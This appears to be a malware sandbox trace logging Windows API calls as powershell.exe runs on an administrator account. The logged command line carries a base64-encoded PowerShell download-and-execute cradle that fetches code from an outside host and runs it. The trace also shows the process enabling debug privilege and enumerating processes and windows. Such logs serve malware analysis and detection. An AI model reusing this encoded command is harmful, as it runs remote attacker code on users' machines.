	[0428.464] CoTaskMemAlloc (cb=0x3b) returned 0x1b93d4c0
	[0428.465] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c88e3b8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c88e3b8) returned 0x4550
	[0428.468] CoTaskMemFree (pv=0x1b93d4c0) 
	[0428.471] GetConsoleWindow () returned 0x102d0
	[0428.652] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0428.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.652] CoTaskMemFree (pv=0x1b91ca40) 
	[0428.653] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0428.653] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0428.653] CoTaskMemFree (pv=0x1b91ca40) 
	[0428.658] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0428.658] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0428.658] CoTaskMemFree (pv=0x1b91ca40) 
	[0428.661] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c88e400 | out: pNumArgs=0x1c88e400) returned 0x1b93dfb0*=""
	[0428.662] lstrlenW (lpString="-EncodedCommand") returned 15
	[0428.663] CoTaskMemAlloc (cb=0x22) returned 0x1b939d70
	[0428.663] RtlMoveMemory (in: Destination=0x1b939d70, Source=0x1b93dfd2, Length=0x20 | out: Destination=0x1b939d70) 
	[0428.663] CoTaskMemFree (pv=0x1b939d70) 
	[0428.663] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0428.663] CoTaskMemAlloc (cb=0x2f4) returned 0x1b93e2f0
	[0428.663] RtlMoveMemory (in: Destination=0x1b93e2f0, Source=0x1b93dff2, Length=0x2f2 | out: Destination=0x1b93e2f0) 
	[0428.663] CoTaskMemFree (pv=0x1b93e2f0) 
	[0428.664] LocalFree (hMem=0x1b93dfb0) returned 0x0
	[0428.665] CoTaskMemAlloc (cb=0x804) returned 0x1b93dfb0
	[0428.665] GetConsoleTitleW (in: lpConsoleTitle=0x1b93dfb0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0428.665] CoTaskMemFree (pv=0x1b93dfb0) 
	[0428.674] CoTaskMemAlloc (cb=0x38e) returned 0x1b93dfb0
	[0428.674] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c88e360*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x318c380 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x318c380*(hProcess=0x36c, hThread=0x368, dwProcessId=0x14f0, dwThreadId=0x14f4)) returned 1
	[0428.702] CoTaskMemFree (pv=0x1b93dfb0) 
	[0428.703] CloseHandle (hObject=0x368) returned 1
	[0428.703] CoTaskMemAlloc (cb=0x3b) returned 0x1b93d4c0
	[0428.703] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c88e408, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c88e408) returned 0x4550
	[0428.704] CoTaskMemFree (pv=0x1b93d4c0) 
	[0429.007] GetCurrentProcess () returned 0xffffffffffffffff
	[0429.007] GetCurrentProcess () returned 0xffffffffffffffff
	[0429.008] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c88e4e8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c88e4e8*=0x368) returned 1

Process:
	id = "32"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x293d7000"
	os_pid = "0x9ec"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 172
	os_tid = 0xa64

	[0377.456] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0379.213] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0379.214] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0379.214] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0379.214] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0382.715] GetVersionExW (in: lpVersionInformation=0x20dda0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20dda0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0382.717] GetVersionExW (in: lpVersionInformation=0x20dda0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20dda0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0382.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.729] GetVersionExW (in: lpVersionInformation=0x20db10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20db10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0382.730] SetErrorMode (uMode=0x1) returned 0x1
	[0382.731] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x20dc70 | out: lpFileInformation=0x20dc70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0382.732] SetErrorMode (uMode=0x1) returned 0x1
	[0383.079] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x20dee0 | out: lpdwHandle=0x20dee0) returned 0x94c
	[0383.081] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c572d8 | out: lpData=0x2c572d8) returned 1
	[0383.083] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x20de58, puLen=0x20de50 | out: lplpBuffer=0x20de58*=0x2c57374, puLen=0x20de50) returned 1
	[0383.086] lstrlenW (lpString="䅁") returned 1
	[0383.095] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x20ddc8, puLen=0x20ddc0 | out: lplpBuffer=0x20ddc8*=0x2c57450, puLen=0x20ddc0) returned 1
	[0383.095] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0383.098] CoTaskMemAlloc (cb=0x2e) returned 0x34da50
	[0383.098] lstrcpyW (in: lpString1=0x34da50, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0383.099] CoTaskMemFree (pv=0x34da50) 
	[0383.099] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x20ddc8, puLen=0x20ddc0 | out: lplpBuffer=0x20ddc8*=0x2c574a4, puLen=0x20ddc0) returned 1
	[0383.099] lstrlenW (lpString="System.Management.Automation") returned 28
	[0383.099] CoTaskMemAlloc (cb=0x3c) returned 0x289860
	[0383.099] lstrcpyW (in: lpString1=0x289860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0383.099] CoTaskMemFree (pv=0x289860) 
	[0383.099] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x20ddc8, puLen=0x20ddc0 | out: lplpBuffer=0x20ddc8*=0x2c57500, puLen=0x20ddc0) returned 1
	[0383.099] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0383.099] CoTaskMemAlloc (cb=0x20) returned 0x34bd50
	[0383.099] lstrcpyW (in: lpString1=0x34bd50, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0383.099] CoTaskMemFree (pv=0x34bd50) 
	[0383.099] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x20ddc8, puLen=0x20ddc0 | out: lplpBuffer=0x20ddc8*=0x2c57540, puLen=0x20ddc0) returned 1
	[0383.099] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0383.099] CoTaskMemAlloc (cb=0x44) returned 0x289860
	[0383.099] lstrcpyW (in: lpString1=0x289860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0383.099] CoTaskMemFree (pv=0x289860) 
	[0383.099] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x20ddc8, puLen=0x20ddc0 | out: lplpBuffer=0x20ddc8*=0x2c575a8, puLen=0x20ddc0) returned 1
	[0383.099] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0383.099] CoTaskMemAlloc (cb=0x76) returned 0x2f4ad0
	[0383.099] lstrcpyW (in: lpString1=0x2f4ad0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0383.099] CoTaskMemFree (pv=0x2f4ad0) 
	[0383.099] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x20ddc8, puLen=0x20ddc0 | out: lplpBuffer=0x20ddc8*=0x2c57644, puLen=0x20ddc0) returned 1
	[0383.099] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0383.099] CoTaskMemAlloc (cb=0x44) returned 0x289860
	[0383.099] lstrcpyW (in: lpString1=0x289860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0383.099] CoTaskMemFree (pv=0x289860) 
	[0383.099] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x20ddc8, puLen=0x20ddc0 | out: lplpBuffer=0x20ddc8*=0x2c576a8, puLen=0x20ddc0) returned 1
	[0383.100] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0383.100] CoTaskMemAlloc (cb=0x58) returned 0x2a51e0
	[0383.100] lstrcpyW (in: lpString1=0x2a51e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0383.100] CoTaskMemFree (pv=0x2a51e0) 
	[0383.100] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x20ddc8, puLen=0x20ddc0 | out: lplpBuffer=0x20ddc8*=0x2c57724, puLen=0x20ddc0) returned 1
	[0383.100] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0383.100] CoTaskMemAlloc (cb=0x20) returned 0x34bd50
	[0383.100] lstrcpyW (in: lpString1=0x34bd50, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0383.100] CoTaskMemFree (pv=0x34bd50) 
	[0383.100] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x20ddc8, puLen=0x20ddc0 | out: lplpBuffer=0x20ddc8*=0x2c573cc, puLen=0x20ddc0) returned 1
	[0383.100] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0383.100] CoTaskMemAlloc (cb=0x66) returned 0x2bb990
	[0383.100] lstrcpyW (in: lpString1=0x2bb990, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0383.100] CoTaskMemFree (pv=0x2bb990) 
	[0383.100] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x20ddc8, puLen=0x20ddc0 | out: lplpBuffer=0x20ddc8*=0x0, puLen=0x20ddc0) returned 0
	[0383.100] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x20ddc8, puLen=0x20ddc0 | out: lplpBuffer=0x20ddc8*=0x0, puLen=0x20ddc0) returned 0
	[0383.100] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x20ddc8, puLen=0x20ddc0 | out: lplpBuffer=0x20ddc8*=0x0, puLen=0x20ddc0) returned 0
	[0383.100] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x20dd98, puLen=0x20dd90 | out: lplpBuffer=0x20dd98*=0x2c57374, puLen=0x20dd90) returned 1
	[0383.101] CoTaskMemAlloc (cb=0x204) returned 0x2ec970
	[0383.101] VerLanguageNameW (in: wLang=0x0, szLang=0x2ec970, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0383.102] CoTaskMemFree (pv=0x2ec970) 
	[0383.103] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\", lplpBuffer=0x20dde8, puLen=0x20dde0 | out: lplpBuffer=0x20dde8*=0x2c57300, puLen=0x20dde0) returned 1
	[0383.108] GetCurrentProcessId () returned 0x9ec
	[0383.562] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x20cd10 | out: lpLuid=0x20cd10*(LowPart=0x14, HighPart=0)) returned 1
	[0383.564] GetCurrentProcess () returned 0xffffffffffffffff
	[0383.565] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x20cd30 | out: TokenHandle=0x20cd30*=0x2e4) returned 1
	[0383.566] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x2c5ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0383.567] CloseHandle (hObject=0x2e4) returned 1
	[0383.571] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ec) returned 0x2e4
	[0383.580] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2c5abb8, cb=0x200, lpcbNeeded=0x20dd48 | out: lphModule=0x2c5abb8, lpcbNeeded=0x20dd48) returned 1
	[0383.582] GetModuleInformation (in: hProcess=0x2e4, hModule=0x13f370000, lpmodinfo=0x2c5ae28, cb=0x18 | out: lpmodinfo=0x2c5ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0383.583] CoTaskMemAlloc (cb=0x804) returned 0x354da0
	[0383.583] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x13f370000, lpBaseName=0x354da0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0383.583] CoTaskMemFree (pv=0x354da0) 
	[0383.584] CoTaskMemAlloc (cb=0x804) returned 0x354da0
	[0383.584] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x13f370000, lpFilename=0x354da0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0383.584] CoTaskMemFree (pv=0x354da0) 
	[0383.585] CloseHandle (hObject=0x2e4) returned 1
	[0383.593] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x9ec) returned 0x2e4
	[0383.594] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0x20de78 | out: lpExitCode=0x20de78*=0x103) returned 1
	[0383.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c5b088, Length=0x20000, ResultLength=0x20de40 | out: SystemInformation=0x12c5b088, ResultLength=0x20de40*=0x20f90) returned 0xc0000004
	[0383.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c7b0b8, Length=0x23790, ResultLength=0x20de40 | out: SystemInformation=0x12c7b0b8, ResultLength=0x20de40*=0x20f90) returned 0x0
	[0384.118] EnumWindows (lpEnumFunc=0x2bd66ac, lParam=0x0) returned 1
	[0384.119] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.119] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x558
	[0384.119] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.119] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.119] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.119] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x538
	[0384.119] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.120] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x778
	[0384.120] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x778
	[0384.120] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.120] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.120] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.120] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.120] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.120] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.120] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.120] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.120] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x460
	[0384.121] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.121] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.121] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x1270
	[0384.121] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x1298
	[0384.121] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x120c
	[0384.121] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x122c
	[0384.121] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x11c4
	[0384.121] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x11b0
	[0384.121] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x1188
	[0384.121] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x1148
	[0384.121] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x1160
	[0384.122] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x10fc
	[0384.122] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xe34
	[0384.122] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xea4
	[0384.122] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x514
